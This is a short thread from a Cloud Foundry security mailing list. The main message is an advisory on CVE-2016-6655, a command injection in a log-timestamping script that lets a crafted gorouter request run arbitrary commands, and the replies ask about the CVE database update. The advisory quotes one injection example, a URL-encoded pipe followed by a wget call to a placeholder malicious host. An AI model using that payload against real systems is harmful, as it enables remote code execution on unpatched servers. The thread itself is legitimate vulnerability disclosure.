Date
1 - 3 of 3
[security] CVE 2016-6655: Utility script command injection
|
Molly Crowther
Hello all - many people were asking for more information, so we have
prepared the following statement regarding CVE-2016-6655: Thanks, Molly Crowther CFF Security Team ------ This issue was discovered by the IBM BlueMix team and was responsibly reported to the Cloud Foundry Foundation. A common script shared by many Cloud Foundry components includes some code responsible for prepending timestamps to component logs. This code is vulnerable to command injection in any component that logs user-provided data. Critically it is possible for an attacker to craft a request to gorouter that can execute arbitrary code as the VCAP user on the gorouter VM. Gorouter logs should be examined for examples of shell-escape sequences if operators suspect that their system may have been compromised. An example woud be to url-encode a pipe (“|”) character followed by a malicious command as in: https://gorouter.your-cf.com/%7Cwget%20 http://something.malicious). Note that this is only one of a number of ways which an attacker could invoke an arbitrary command via this vulnerability. Fixes were made to every CF component where this utility script is run. Some components include this script but do not run it. Future updates will remove the final unused instances of the vulnerable code to prevent unintentional reintroduction. Operators are strongly encouraged to upgrade to CF 245 or later and use the most recent version of any standalone CF components. For the original public notice regarding CVE-2016-6655, please see: https://lists.cloudfoundry.org/archives/list/cf-dev(a)lists.cloudfoundry.org/message/42YUJU2N27HBPFVMZR2QM7JI6YSEKORR/ On Mon, Oct 17, 2016 at 8:34 AM, Travis McPeak <tmcpeak(a)cloudfoundry.org> wrote: CVE 2016-6655: Utility script command injectionSeverity |
|
|
|
Hector Rivas Gandara
Hello,
Thank you for reporting this. I observed that the CVE in mitre.org did not get updated: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6655 How long does it take to get it updated? On 17 October 2016 at 20:34, Molly Crowther <mcrowther(a)cloudfoundry.org> wrote: Hello all - many people were asking for more information, so we have -- Regards Hector Rivas | GDS / Multi-Cloud PaaS |
|
|
|
Molly Crowther
Hello Hector,
The answer is that it varies. I can tell you that we have followed the steps we need to do to get it into the database, it just takes time depending on how fast MITRE makes the updates. It is not an automatic process. Let me know if you have any other questions. Thanks, Molly Crowther CFF Security Team On Fri, Oct 21, 2016 at 2:46 AM, Hector Rivas Gandara < hector.rivas.gandara(a)digital.cabinet-office.gov.uk> wrote: Hello, |
|
|